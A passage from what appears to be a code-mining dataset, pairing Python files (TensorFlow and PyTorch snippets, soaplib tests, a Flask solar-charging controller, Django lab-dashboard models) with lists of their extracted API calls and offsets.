"View.Painel.pa... | [((391, 428), 'View.telaNovoProjeto.TelaNovoProjeto', 'telaNovoProjeto.TelaNovoProjeto', (['tela'], {}), '(tela)\n', (422, 428), False, 'from View import telaRelatorio, telaNovoProjeto, telaAbrirProjeto, telaCadastro, telaConfigura, telaConexao, telaEditarControle, telaPopUp\n'), ((473, 512), 'View.telaAbrirProjeto.TelaAbrirProjeto', 'telaAbrirProjeto.TelaAbrirProjeto', (['tela'], {}), '(tela)\n', (506, 512), False, 'from View import telaRelatorio, telaNovoProjeto, telaAbrirProjeto, telaCadastro, telaConfigura, telaConexao, telaEditarControle, telaPopUp\n'), ((549, 582), 'View.telaRelatorio.TelaRelatorio', 'telaRelatorio.TelaRelatorio', (['tela'], {}), '(tela)\n', (576, 582), False, 'from View import telaRelatorio, telaNovoProjeto, telaAbrirProjeto, telaCadastro, telaConfigura, telaConexao, telaEditarControle, telaPopUp\n'), ((617, 648), 'View.telaCadastro.TelaCadastro', 'telaCadastro.TelaCadastro', (['tela'], {}), '(tela)\n', (642, 648), False, 'from View import telaRelatorio, telaNovoProjeto, telaAbrirProjeto, telaCadastro, telaConfigura, telaConexao, telaEditarControle, telaPopUp\n'), ((685, 718), 'View.telaConfigura.TelaConfigura', 'telaConfigura.TelaConfigura', (['tela'], {}), '(tela)\n', (712, 718), False, 'from View import telaRelatorio, telaNovoProjeto, telaAbrirProjeto, telaCadastro, telaConfigura, telaConexao, telaEditarControle, telaPopUp\n'), ((753, 782), 'View.telaConexao.TelaConexao', 'telaConexao.TelaConexao', (['tela'], {}), '(tela)\n', (776, 782), False, 'from View import telaRelatorio, telaNovoProjeto, telaAbrirProjeto, telaCadastro, telaConfigura, telaConexao, telaEditarControle, telaPopUp\n'), ((855, 900), 'View.Conexao.telaConAnalogAnalog.TelaConAnalogAnalog', 'telaConAnalogAnalog.TelaConAnalogAnalog', (['tela'], {}), '(tela)\n', (894, 900), False, 'from View.Conexao import telaConAnalogAnalog, telaConAnalogDigit, telaConDigitAnalog, telaConDigitDigit\n'), ((936, 977), 'View.Conexao.telaConAnalogDigit.TelaConAnalogDig', 'telaConAnalogDigit.TelaConAnalogDig', (['tela'], {}), '(tela)\n', (971, 977), False, 'from View.Conexao import telaConAnalogAnalog, telaConAnalogDigit, telaConDigitAnalog, telaConDigitDigit\n'), ((1012, 1053), 'View.Conexao.telaConDigitAnalog.TelaConDigAnalog', 'telaConDigitAnalog.TelaConDigAnalog', (['tela'], {}), '(tela)\n', (1047, 1053), False, 'from View.Conexao import telaConAnalogAnalog, telaConAnalogDigit, telaConDigitAnalog, telaConDigitDigit\n'), ((1089, 1126), 'View.Conexao.telaConDigitDigit.TelaConDigDig', 'telaConDigitDigit.TelaConDigDig', (['tela'], {}), '(tela)\n', (1120, 1126), False, 'from View.Conexao import telaConAnalogAnalog, telaConAnalogDigit, telaConDigitAnalog, telaConDigitDigit\n'), ((1193, 1229), 'View.Painel.painelSensores.PainelSensores', 'painelSensores.PainelSensores', (['frame'], {}), '(frame)\n', (1222, 1229), False, 'from View.Painel import painelSensores, painelControladores, painelConexao\n'), ((1278, 1330), 'View.Painel.painelControladores.PainelControladores', 'painelControladores.PainelControladores', (['frame', 'tela'], {}), '(frame, tela)\n', (1317, 1330), False, 'from View.Painel import painelSensores, painelControladores, painelConexao\n'), ((1373, 1413), 'View.Painel.painelConexao.PainelConexao', 'painelConexao.PainelConexao', (['frame', 'tela'], {}), '(frame, tela)\n', (1400, 1413), False, 'from View.Painel import painelSensores, painelControladores, painelConexao\n'), ((1519, 1572), 'View.telaEditarControle.TelaEditarControle', 'telaEditarControle.TelaEditarControle', (['tela', 'controle'], {}), '(tela, controle)\n', (1556, 1572), False, 'from View import telaRelatorio, telaNovoProjeto, telaAbrirProjeto, telaCadastro, telaConfigura, telaConexao, telaEditarControle, telaPopUp\n'), ((1636, 1671), 'View.telaPopUp.TelaPopUp', 'telaPopUp.TelaPopUp', (['tela', 'mensagem'], {}), '(tela, mensagem)\n', (1655, 1671), False, 'from View import telaRelatorio, telaNovoProjeto, telaAbrirProjeto, telaCadastro, telaConfigura, telaConexao, telaEditarControle, telaPopUp\n')] |
import tensorflow as tf
import numpy as np
a = np.arange(15)
out = a.reshape(5, 3)
c = np.arange(15) / 2
y_onehot = c.reshape(5, 3)
out_tensor = tf.convert_to_tensor(out, dtype=tf.float32)
y_onehot_tensor = tf.convert_to_tensor(y_onehot, dtype=tf.float32)
# y_onehot = tf.one_hot(y_onehot_tensor, depth=3) # one-hot编码
loss1 = tf.square(out_tensor - y_onehot_tensor)
loss2 = tf.reduce_sum(loss1) / 32
pass | [
"tensorflow.convert_to_tensor",
"tensorflow.reduce_sum",
"numpy.arange",
"tensorflow.square"
] | [((48, 61), 'numpy.arange', 'np.arange', (['(15)'], {}), '(15)\n', (57, 61), True, 'import numpy as np\n'), ((148, 191), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['out'], {'dtype': 'tf.float32'}), '(out, dtype=tf.float32)\n', (168, 191), True, 'import tensorflow as tf\n'), ((210, 258), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['y_onehot'], {'dtype': 'tf.float32'}), '(y_onehot, dtype=tf.float32)\n', (230, 258), True, 'import tensorflow as tf\n'), ((331, 370), 'tensorflow.square', 'tf.square', (['(out_tensor - y_onehot_tensor)'], {}), '(out_tensor - y_onehot_tensor)\n', (340, 370), True, 'import tensorflow as tf\n'), ((89, 102), 'numpy.arange', 'np.arange', (['(15)'], {}), '(15)\n', (98, 102), True, 'import numpy as np\n'), ((379, 399), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['loss1'], {}), '(loss1)\n', (392, 399), True, 'import tensorflow as tf\n')] |
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
# Author: <NAME> (<EMAIL>)
# Date: 05/15/2019
#
import os
import numpy as np
import math
import sys
from torch.utils.data import Sampler
__all__=['BatchSampler', 'DistributedBatchSampler', 'RandomSampler', 'SequentialSampler']
class BatchSampler(Sampler):
def __init__(self, sampler, batch_size):
self.sampler = sampler
self.batch_size = batch_size
def __iter__(self):
batch = []
for idx in self.sampler:
batch.append(idx)
if len(batch)==self.batch_size:
yield batch
batch = []
if len(batch)>0:
yield batch
def __len__(self):
return (len(self.sampler) + self.batch_size - 1)//self.batch_size
class DistributedBatchSampler(Sampler):
def __init__(self, sampler, rank=0, world_size = 1, drop_last = False):
self.sampler = sampler
self.rank = rank
self.world_size = world_size
self.drop_last = drop_last
def __iter__(self):
for b in self.sampler:
if len(b)%self.world_size != 0:
if self.drop_last:
break
else:
b.extend([b[0] for _ in range(self.world_size-len(b)%self.world_size)])
chunk_size = len(b)//self.world_size
yield b[self.rank*chunk_size:(self.rank+1)*chunk_size]
def __len__(self):
return len(self.sampler)
class RandomSampler(Sampler):
def __init__(self, total_samples:int, data_seed:int = 0):
self.indices = np.array(np.arange(total_samples))
self.rng = np.random.RandomState(data_seed)
def __iter__(self):
self.rng.shuffle(self.indices)
for i in self.indices:
yield i
def __len__(self):
return len(self.indices)
class SequentialSampler(Sampler):
def __init__(self, total_samples:int):
self.indices = np.array(np.arange(total_samples))
def __iter__(self):
for i in self.indices:
yield i
def __len__(self):
return len(self.indices)
| [
"numpy.random.RandomState",
"numpy.arange"
] | [((1557, 1589), 'numpy.random.RandomState', 'np.random.RandomState', (['data_seed'], {}), '(data_seed)\n', (1578, 1589), True, 'import numpy as np\n'), ((1516, 1540), 'numpy.arange', 'np.arange', (['total_samples'], {}), '(total_samples)\n', (1525, 1540), True, 'import numpy as np\n'), ((1844, 1868), 'numpy.arange', 'np.arange', (['total_samples'], {}), '(total_samples)\n', (1853, 1868), True, 'import numpy as np\n')] |
#!/usr/bin/env python
#
# soaplib - Copyright (C) Soaplib contributors.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301
#
import datetime
import unittest
from soaplib.core.model.clazz import ClassModel
from soaplib.core.model.clazz import Array
from soaplib.core.model.primitive import DateTime
from soaplib.core.model.primitive import Float
from soaplib.core.model.primitive import Integer
from soaplib.core.model.primitive import String
from lxml import etree
ns_test = 'test_namespace'
class Address(ClassModel):
street = String(min_occurs=1)
city = String(min_occurs=1)
zip = Integer(min_occurs=1)
since = DateTime(min_occurs=1)
lattitude = Float(min_occurs=1)
longitude = Float(min_occurs=1)
Address.resolve_namespace(Address,__name__)
class Person(ClassModel):
name = String
birthdate = DateTime
age = Integer
addresses = Array(Address)
titles = Array(String)
Person.resolve_namespace(Person,__name__)
class Employee(Person):
employee_id = Integer
salary = Float
Employee.resolve_namespace(Employee,__name__)
class Level2(ClassModel):
arg1 = String
arg2 = Float
Level2.resolve_namespace(Level2, __name__)
class Level3(ClassModel):
arg1 = Integer
Level3.resolve_namespace(Level3, __name__)
class Level4(ClassModel):
arg1 = String
Level4.resolve_namespace(Level4, __name__)
class Level1(ClassModel):
level2 = Level2
level3 = Array(Level3)
level4 = Array(Level4)
Level1.resolve_namespace(Level1, __name__)
class TestClassModel(unittest.TestCase):
def test_simple_class(self):
a = Address()
a.street = '123 happy way'
a.city = 'badtown'
a.zip = 32
a.lattitude = 4.3
a.longitude = 88.0
element = etree.Element('test')
Address.to_parent_element(a, ns_test, element)
element = element[0]
self.assertEquals(6, len(element.getchildren()))
r = Address.from_xml(element)
self.assertEquals(a.street, r.street)
self.assertEquals(a.city, r.city)
self.assertEquals(a.zip, r.zip)
self.assertEquals(a.lattitude, r.lattitude)
self.assertEquals(a.longitude, r.longitude)
self.assertEquals(a.since, r.since)
def test_nested_class(self): # FIXME: this test is incomplete
p = Person()
element = etree.Element('test')
Person.to_parent_element(p, ns_test, element)
element = element[0]
self.assertEquals(None, p.name)
self.assertEquals(None, p.birthdate)
self.assertEquals(None, p.age)
self.assertEquals(None, p.addresses)
def test_class_array(self):
peeps = []
names = ['bob', 'jim', 'peabody', 'mumblesleves']
for name in names:
a = Person()
a.name = name
a.birthdate = datetime.datetime(1979, 1, 1)
a.age = 27
peeps.append(a)
type = Array(Person)
type.resolve_namespace(type,__name__)
element = etree.Element('test')
type.to_parent_element(peeps, ns_test, element)
element = element[0]
self.assertEquals(4, len(element.getchildren()))
peeps2 = type.from_xml(element)
for i in range(0, 4):
self.assertEquals(peeps2[i].name, names[i])
self.assertEquals(peeps2[i].birthdate,
datetime.datetime(1979, 1, 1))
def test_class_nested_array(self):
peeps = []
names = ['bob', 'jim', 'peabody', 'mumblesleves']
for name in names:
a = Person()
a.name = name
a.birthdate = datetime.datetime(1979, 1, 1)
a.age = 27
a.addresses = []
for i in range(0, 25):
addr = Address()
addr.street = '555 downtown'
addr.city = 'funkytown'
a.addresses.append(addr)
peeps.append(a)
type = Array(Person)
type.resolve_namespace(type,__name__)
element = etree.Element('test')
type.to_parent_element(peeps, ns_test, element)
element = element[0]
self.assertEquals(4, len(element.getchildren()))
peeps2 = type.from_xml(element)
for peep in peeps2:
self.assertEquals(27, peep.age)
self.assertEquals(25, len(peep.addresses))
self.assertEquals('funkytown', peep.addresses[18].city)
def test_complex_class(self):
l = Level1()
l.level2 = Level2()
l.level2.arg1 = 'abcd'
l.level2.arg2 = 1.444
l.level3 = []
l.level4 = []
for i in range(0, 100):
a = Level3()
a.arg1 = i
l.level3.append(a)
for i in range(0, 4):
a = Level4()
a.arg1 = str(i)
l.level4.append(a)
element = etree.Element('test')
Level1.to_parent_element(l, ns_test, element)
element = element[0]
l1 = Level1.from_xml(element)
self.assertEquals(l1.level2.arg1, l.level2.arg1)
self.assertEquals(l1.level2.arg2, l.level2.arg2)
self.assertEquals(len(l1.level4), len(l.level4))
self.assertEquals(100, len(l.level3))
def test_customize(self):
class Base(ClassModel):
class Attributes(ClassModel.Attributes):
prop1=3
prop2=6
Base2 = Base.customize(prop1=4)
self.assertNotEquals(Base.Attributes.prop1, Base2.Attributes.prop1)
self.assertEquals(Base.Attributes.prop2, Base2.Attributes.prop2)
class Derived(Base):
class Attributes(Base.Attributes):
prop3 = 9
prop4 = 12
Derived2 = Derived.customize(prop1=5, prop3=12)
self.assertEquals(Base.Attributes.prop1, 3)
self.assertEquals(Base2.Attributes.prop1, 4)
self.assertEquals(Derived.Attributes.prop1, 3)
self.assertEquals(Derived2.Attributes.prop1, 5)
self.assertNotEquals(Derived.Attributes.prop3, Derived2.Attributes.prop3)
self.assertEquals(Derived.Attributes.prop4, Derived2.Attributes.prop4)
Derived3 = Derived.customize(prop3=12)
Base.prop1 = 4
# changes made to bases propagate, unless overridden
self.assertEquals(Derived.Attributes.prop1, Base.Attributes.prop1)
self.assertNotEquals(Derived2.Attributes.prop1, Base.Attributes.prop1)
self.assertEquals(Derived3.Attributes.prop1, Base.Attributes.prop1)
def test_from_string(self):
from soaplib.core.util.model_utils import ClassModelConverter
class Simple(ClassModel):
number = Integer
text = String
class NotSoSimple(ClassModel):
number_1 = Integer
number_2 = Integer
body = Simple
nss = NotSoSimple()
nss.number_1 = 100
nss.number_2 = 1000
nss.body = Simple()
nss.body.number = 1
nss.body.text = "Some Text"
cmc = ClassModelConverter(nss, "testfromstring", include_ns=False)
element = cmc.to_etree()
assert nss.body.number == 1
assert nss.number_1 == 100
nss_from_xml = NotSoSimple.from_string(cmc.to_xml())
assert nss_from_xml.body.number == 1
assert nss_from_xml.body.text == "Some Text"
assert nss_from_xml.number_1 == 100
assert nss_from_xml.number_2 == 1000
if __name__ == '__main__':
unittest.main()
| [
"lxml.etree.Element",
"soaplib.core.model.clazz.Array",
"datetime.datetime",
"soaplib.core.model.primitive.Integer",
"soaplib.core.model.primitive.Float",
"unittest.main",
"soaplib.core.util.model_utils.ClassModelConverter",
"soaplib.core.model.primitive.String",
"soaplib.core.model.primitive.DateTi... | [((1212, 1232), 'soaplib.core.model.primitive.String', 'String', ([], {'min_occurs': '(1)'}), '(min_occurs=1)\n', (1218, 1232), False, 'from soaplib.core.model.primitive import String\n'), ((1244, 1264), 'soaplib.core.model.primitive.String', 'String', ([], {'min_occurs': '(1)'}), '(min_occurs=1)\n', (1250, 1264), False, 'from soaplib.core.model.primitive import String\n'), ((1275, 1296), 'soaplib.core.model.primitive.Integer', 'Integer', ([], {'min_occurs': '(1)'}), '(min_occurs=1)\n', (1282, 1296), False, 'from soaplib.core.model.primitive import Integer\n'), ((1309, 1331), 'soaplib.core.model.primitive.DateTime', 'DateTime', ([], {'min_occurs': '(1)'}), '(min_occurs=1)\n', (1317, 1331), False, 'from soaplib.core.model.primitive import DateTime\n'), ((1348, 1367), 'soaplib.core.model.primitive.Float', 'Float', ([], {'min_occurs': '(1)'}), '(min_occurs=1)\n', (1353, 1367), False, 'from soaplib.core.model.primitive import Float\n'), ((1384, 1403), 'soaplib.core.model.primitive.Float', 'Float', ([], {'min_occurs': '(1)'}), '(min_occurs=1)\n', (1389, 1403), False, 'from soaplib.core.model.primitive import Float\n'), ((1553, 1567), 'soaplib.core.model.clazz.Array', 'Array', (['Address'], {}), '(Address)\n', (1558, 1567), False, 'from soaplib.core.model.clazz import Array\n'), ((1581, 1594), 'soaplib.core.model.clazz.Array', 'Array', (['String'], {}), '(String)\n', (1586, 1594), False, 'from soaplib.core.model.clazz import Array\n'), ((2100, 2113), 'soaplib.core.model.clazz.Array', 'Array', (['Level3'], {}), '(Level3)\n', (2105, 2113), False, 'from soaplib.core.model.clazz import Array\n'), ((2127, 2140), 'soaplib.core.model.clazz.Array', 'Array', (['Level4'], {}), '(Level4)\n', (2132, 2140), False, 'from soaplib.core.model.clazz import Array\n'), ((8144, 8159), 'unittest.main', 'unittest.main', ([], {}), '()\n', (8157, 8159), False, 'import unittest\n'), ((2436, 2457), 'lxml.etree.Element', 'etree.Element', (['"""test"""'], {}), "('test')\n", (2449, 2457), False, 'from lxml import etree\n'), ((3021, 3042), 'lxml.etree.Element', 'etree.Element', (['"""test"""'], {}), "('test')\n", (3034, 3042), False, 'from lxml import etree\n'), ((3607, 3620), 'soaplib.core.model.clazz.Array', 'Array', (['Person'], {}), '(Person)\n', (3612, 3620), False, 'from soaplib.core.model.clazz import Array\n'), ((3686, 3707), 'lxml.etree.Element', 'etree.Element', (['"""test"""'], {}), "('test')\n", (3699, 3707), False, 'from lxml import etree\n'), ((4619, 4632), 'soaplib.core.model.clazz.Array', 'Array', (['Person'], {}), '(Person)\n', (4624, 4632), False, 'from soaplib.core.model.clazz import Array\n'), ((4697, 4718), 'lxml.etree.Element', 'etree.Element', (['"""test"""'], {}), "('test')\n", (4710, 4718), False, 'from lxml import etree\n'), ((5533, 5554), 'lxml.etree.Element', 'etree.Element', (['"""test"""'], {}), "('test')\n", (5546, 5554), False, 'from lxml import etree\n'), ((7695, 7755), 'soaplib.core.util.model_utils.ClassModelConverter', 'ClassModelConverter', (['nss', '"""testfromstring"""'], {'include_ns': '(False)'}), "(nss, 'testfromstring', include_ns=False)\n", (7714, 7755), False, 'from soaplib.core.util.model_utils import ClassModelConverter\n'), ((3510, 3539), 'datetime.datetime', 'datetime.datetime', (['(1979)', '(1)', '(1)'], {}), '(1979, 1, 1)\n', (3527, 3539), False, 'import datetime\n'), ((4298, 4327), 'datetime.datetime', 'datetime.datetime', (['(1979)', '(1)', '(1)'], {}), '(1979, 1, 1)\n', (4315, 4327), False, 'import datetime\n'), ((4045, 4074), 'datetime.datetime', 'datetime.datetime', (['(1979)', '(1)', '(1)'], {}), '(1979, 1, 1)\n', (4062, 4074), False, 'import datetime\n')] |
import moeda
preco = float(input("Digite o preço: R$"))
por100 = float(input("Digite a porcentagem: "))
formatar = str(input("Deseja formatar como moeda [S/N]? ")).upper()
if "S" in formatar:
formatado = True
else:
formatado = False
print(f"\nA metade de {moeda.moeda(preco)} é {moeda.metade(preco, formatado)}")
print(f"O dobro de {moeda.moeda(preco)} é {moeda.dobro(preco, formatado)}")
print(f"Aumentando {por100}% de {moeda.moeda(preco)}, temos {moeda.aumentar(preco, por100, formatado)}")
print(f"Diminuindo {por100}% de {moeda.moeda(preco)}, temos {moeda.diminuir(preco, por100, formatado)}")
| [
"moeda.moeda",
"moeda.dobro",
"moeda.diminuir",
"moeda.aumentar",
"moeda.metade"
] | [((267, 285), 'moeda.moeda', 'moeda.moeda', (['preco'], {}), '(preco)\n', (278, 285), False, 'import moeda\n'), ((291, 321), 'moeda.metade', 'moeda.metade', (['preco', 'formatado'], {}), '(preco, formatado)\n', (303, 321), False, 'import moeda\n'), ((344, 362), 'moeda.moeda', 'moeda.moeda', (['preco'], {}), '(preco)\n', (355, 362), False, 'import moeda\n'), ((368, 397), 'moeda.dobro', 'moeda.dobro', (['preco', 'formatado'], {}), '(preco, formatado)\n', (379, 397), False, 'import moeda\n'), ((433, 451), 'moeda.moeda', 'moeda.moeda', (['preco'], {}), '(preco)\n', (444, 451), False, 'import moeda\n'), ((461, 501), 'moeda.aumentar', 'moeda.aumentar', (['preco', 'por100', 'formatado'], {}), '(preco, por100, formatado)\n', (475, 501), False, 'import moeda\n'), ((538, 556), 'moeda.moeda', 'moeda.moeda', (['preco'], {}), '(preco)\n', (549, 556), False, 'import moeda\n'), ((566, 606), 'moeda.diminuir', 'moeda.diminuir', (['preco', 'por100', 'formatado'], {}), '(preco, por100, formatado)\n', (580, 606), False, 'import moeda\n')] |
import logging
# configure logging before initializing further modules
logging.basicConfig(level=logging.DEBUG, format="%(asctime)s [%(levelname)s] %(name)s - %(message)s")
logging.getLogger("urllib3.connectionpool").setLevel(logging.INFO)
import argparse
import json
import flask
import flask_compress
from werkzeug.middleware.dispatcher import DispatcherMiddleware
import prometheus_client
from pvcontrol import views, relay
from pvcontrol.meter import MeterFactory
from pvcontrol.chargecontroller import ChargeControllerFactory
from pvcontrol.wallbox import WallboxFactory
from pvcontrol.car import CarFactory
from pvcontrol.scheduler import Scheduler
logger = logging.getLogger(__name__)
parser = argparse.ArgumentParser(description="PV Control")
parser.add_argument("-m", "--meter", default="SimulatedMeter")
parser.add_argument("-w", "--wallbox", default="SimulatedWallbox")
parser.add_argument("-a", "--car", default="SimulatedCar")
parser.add_argument("-c", "--config", default="{}")
args = parser.parse_args()
logger.info("Starting pvcontrol")
logger.info(f"Meter: {args.meter}")
logger.info(f"Wallbox: {args.wallbox}")
logger.info(f"Car: {args.car}")
logger.info(f"config: {args.config}")
config = json.loads(args.config)
for c in ["wallbox", "meter", "car", "controller"]:
if c not in config:
config[c] = {}
wallbox = WallboxFactory.newWallbox(args.wallbox, **config["wallbox"])
meter = MeterFactory.newMeter(args.meter, wallbox, **config["meter"])
car = CarFactory.newCar(args.car, **config["car"])
controller = ChargeControllerFactory.newController(meter, wallbox, **config["controller"])
controller_scheduler = Scheduler(controller.get_config().cycle_time, controller.run)
controller_scheduler.start()
car_scheduler = Scheduler(car.get_config().cycle_time, car.read_data)
car_scheduler.start()
app = flask.Flask(__name__)
app.json_encoder = views.JSONEncoder
app.after_request(views.add_no_cache_header)
app.config["COMPRESS_MIN_SIZE"] = 2048
app.config["COMPRESS_MIMETYPES"] = ["text/html", "text/css", "application/json", "application/javascript", "image/vnd.microsoft.icon"]
compress = flask_compress.Compress()
compress.init_app(app)
app.add_url_rule("/", view_func=views.StaticResourcesView.as_view("get_index"), defaults={"path": "index.html"})
app.add_url_rule("/<path:path>", view_func=views.StaticResourcesView.as_view("get_static"))
app.add_url_rule("/api/pvcontrol", view_func=views.PvControlView.as_view("get_pvcontrol", meter, wallbox, controller, car))
app.add_url_rule("/api/pvcontrol/controller", view_func=views.PvControlConfigDataView.as_view("get_controller", controller))
app.add_url_rule("/api/pvcontrol/controller/desired_mode", view_func=views.PvControlChargeModeView.as_view("put_desired_mode", controller))
app.add_url_rule("/api/pvcontrol/controller/phase_mode", view_func=views.PvControlPhaseModeView.as_view("put_phase_mode", controller))
app.add_url_rule("/api/pvcontrol/meter", view_func=views.PvControlConfigDataView.as_view("get_meter", meter))
app.add_url_rule("/api/pvcontrol/wallbox", view_func=views.PvControlConfigDataView.as_view("get_wallbox", wallbox))
app.add_url_rule("/api/pvcontrol/car", view_func=views.PvControlConfigDataView.as_view("get_car", car))
# for testing only
app.add_url_rule("/api/pvcontrol/wallbox/car_status", view_func=views.PvControlCarStatusView.as_view("put_car_status", wallbox))
# Add prometheus wsgi middleware to route /metrics requests
app.wsgi_app = DispatcherMiddleware(app.wsgi_app, {"/metrics": prometheus_client.make_wsgi_app()})
app.run(host="0.0.0.0", port=8080)
controller_scheduler.stop()
car_scheduler.stop()
# disable charging to play it safe
# TODO: see ChargeMode.INIT handling
logger.info("Set wallbox.allow_charging=False on shutdown.")
wallbox.allow_charging(False)
relay.cleanup()
logger.info("Stopped pvcontrol")
| [
"logging.basicConfig",
"logging.getLogger",
"json.loads",
"pvcontrol.meter.MeterFactory.newMeter",
"argparse.ArgumentParser",
"pvcontrol.car.CarFactory.newCar",
"pvcontrol.chargecontroller.ChargeControllerFactory.newController",
"flask.Flask",
"pvcontrol.views.PvControlCarStatusView.as_view",
"pvc... | [((72, 178), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.DEBUG', 'format': '"""%(asctime)s [%(levelname)s] %(name)s - %(message)s"""'}), "(level=logging.DEBUG, format=\n '%(asctime)s [%(levelname)s] %(name)s - %(message)s')\n", (91, 178), False, 'import logging\n'), ((668, 695), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (685, 695), False, 'import logging\n'), ((706, 755), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""PV Control"""'}), "(description='PV Control')\n", (729, 755), False, 'import argparse\n'), ((1221, 1244), 'json.loads', 'json.loads', (['args.config'], {}), '(args.config)\n', (1231, 1244), False, 'import json\n'), ((1355, 1415), 'pvcontrol.wallbox.WallboxFactory.newWallbox', 'WallboxFactory.newWallbox', (['args.wallbox'], {}), "(args.wallbox, **config['wallbox'])\n", (1380, 1415), False, 'from pvcontrol.wallbox import WallboxFactory\n'), ((1424, 1485), 'pvcontrol.meter.MeterFactory.newMeter', 'MeterFactory.newMeter', (['args.meter', 'wallbox'], {}), "(args.meter, wallbox, **config['meter'])\n", (1445, 1485), False, 'from pvcontrol.meter import MeterFactory\n'), ((1492, 1536), 'pvcontrol.car.CarFactory.newCar', 'CarFactory.newCar', (['args.car'], {}), "(args.car, **config['car'])\n", (1509, 1536), False, 'from pvcontrol.car import CarFactory\n'), ((1550, 1627), 'pvcontrol.chargecontroller.ChargeControllerFactory.newController', 'ChargeControllerFactory.newController', (['meter', 'wallbox'], {}), "(meter, wallbox, **config['controller'])\n", (1587, 1627), False, 'from pvcontrol.chargecontroller import ChargeControllerFactory\n'), ((1842, 1863), 'flask.Flask', 'flask.Flask', (['__name__'], {}), '(__name__)\n', (1853, 1863), False, 'import flask\n'), ((2131, 2156), 'flask_compress.Compress', 'flask_compress.Compress', ([], {}), '()\n', (2154, 2156), False, 'import flask_compress\n'), ((3797, 3812), 'pvcontrol.relay.cleanup', 'relay.cleanup', ([], {}), '()\n', (3810, 3812), False, 'from pvcontrol import views, relay\n'), ((174, 217), 'logging.getLogger', 'logging.getLogger', (['"""urllib3.connectionpool"""'], {}), "('urllib3.connectionpool')\n", (191, 217), False, 'import logging\n'), ((2213, 2259), 'pvcontrol.views.StaticResourcesView.as_view', 'views.StaticResourcesView.as_view', (['"""get_index"""'], {}), "('get_index')\n", (2246, 2259), False, 'from pvcontrol import views, relay\n'), ((2337, 2384), 'pvcontrol.views.StaticResourcesView.as_view', 'views.StaticResourcesView.as_view', (['"""get_static"""'], {}), "('get_static')\n", (2370, 2384), False, 'from pvcontrol import views, relay\n'), ((2431, 2508), 'pvcontrol.views.PvControlView.as_view', 'views.PvControlView.as_view', (['"""get_pvcontrol"""', 'meter', 'wallbox', 'controller', 'car'], {}), "('get_pvcontrol', meter, wallbox, controller, car)\n", (2458, 2508), False, 'from pvcontrol import views, relay\n'), ((2566, 2633), 'pvcontrol.views.PvControlConfigDataView.as_view', 'views.PvControlConfigDataView.as_view', (['"""get_controller"""', 'controller'], {}), "('get_controller', controller)\n", (2603, 2633), False, 'from pvcontrol import views, relay\n'), ((2704, 2773), 'pvcontrol.views.PvControlChargeModeView.as_view', 'views.PvControlChargeModeView.as_view', (['"""put_desired_mode"""', 'controller'], {}), "('put_desired_mode', controller)\n", (2741, 2773), False, 'from pvcontrol import views, relay\n'), ((2842, 2908), 'pvcontrol.views.PvControlPhaseModeView.as_view', 'views.PvControlPhaseModeView.as_view', (['"""put_phase_mode"""', 'controller'], {}), "('put_phase_mode', controller)\n", (2878, 2908), False, 'from pvcontrol import views, relay\n'), ((2961, 3018), 'pvcontrol.views.PvControlConfigDataView.as_view', 'views.PvControlConfigDataView.as_view', (['"""get_meter"""', 'meter'], {}), "('get_meter', meter)\n", (2998, 3018), False, 'from pvcontrol import views, relay\n'), ((3073, 3134), 'pvcontrol.views.PvControlConfigDataView.as_view', 'views.PvControlConfigDataView.as_view', (['"""get_wallbox"""', 'wallbox'], {}), "('get_wallbox', wallbox)\n", (3110, 3134), False, 'from pvcontrol import views, relay\n'), ((3185, 3238), 'pvcontrol.views.PvControlConfigDataView.as_view', 'views.PvControlConfigDataView.as_view', (['"""get_car"""', 'car'], {}), "('get_car', car)\n", (3222, 3238), False, 'from pvcontrol import views, relay\n'), ((3323, 3386), 'pvcontrol.views.PvControlCarStatusView.as_view', 'views.PvControlCarStatusView.as_view', (['"""put_car_status"""', 'wallbox'], {}), "('put_car_status', wallbox)\n", (3359, 3386), False, 'from pvcontrol import views, relay\n'), ((3513, 3546), 'prometheus_client.make_wsgi_app', 'prometheus_client.make_wsgi_app', ([], {}), '()\n', (3544, 3546), False, 'import prometheus_client\n')] |
##############################################################################
# Copyright (c) 2016 <NAME> and others.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
##############################################################################
from django.contrib.auth.models import User
from django.db import models
from django.apps import apps
import json
import random
from collections import Counter
from dashboard.exceptions import ResourceAvailabilityException
class LabStatus(object):
"""
A Poor man's enum for the status of a lab.
If everything is working fine at a lab, it is UP.
If it is down temporarily e.g. for maintenance, it is TEMP_DOWN
If its broken, its DOWN
"""
UP = 0
TEMP_DOWN = 100
DOWN = 200
def upload_to(object, filename):
return object.user.username + '/' + filename
class UserProfile(models.Model):
"""Extend the Django User model."""
user = models.OneToOneField(User, on_delete=models.CASCADE)
timezone = models.CharField(max_length=100, blank=False, default='UTC')
ssh_public_key = models.FileField(upload_to=upload_to, null=True, blank=True)
pgp_public_key = models.FileField(upload_to=upload_to, null=True, blank=True)
email_addr = models.CharField(max_length=300, blank=False, default='<EMAIL>')
company = models.CharField(max_length=200, blank=False)
oauth_token = models.CharField(max_length=1024, blank=False)
oauth_secret = models.CharField(max_length=1024, blank=False)
jira_url = models.CharField(max_length=100, null=True, blank=True, default='')
full_name = models.CharField(max_length=100, null=True, blank=True, default='')
booking_privledge = models.BooleanField(default=False)
public_user = models.BooleanField(default=False)
class Meta:
db_table = 'user_profile'
def __str__(self):
return self.user.username
class VlanManager(models.Model):
"""
Keeps track of the vlans for a lab.
Vlans are represented as indexes into a 4096 element list.
This list is serialized to JSON for storing in the DB.
"""
# list of length 4096 containing either 0 (not available) or 1 (available)
vlans = models.TextField()
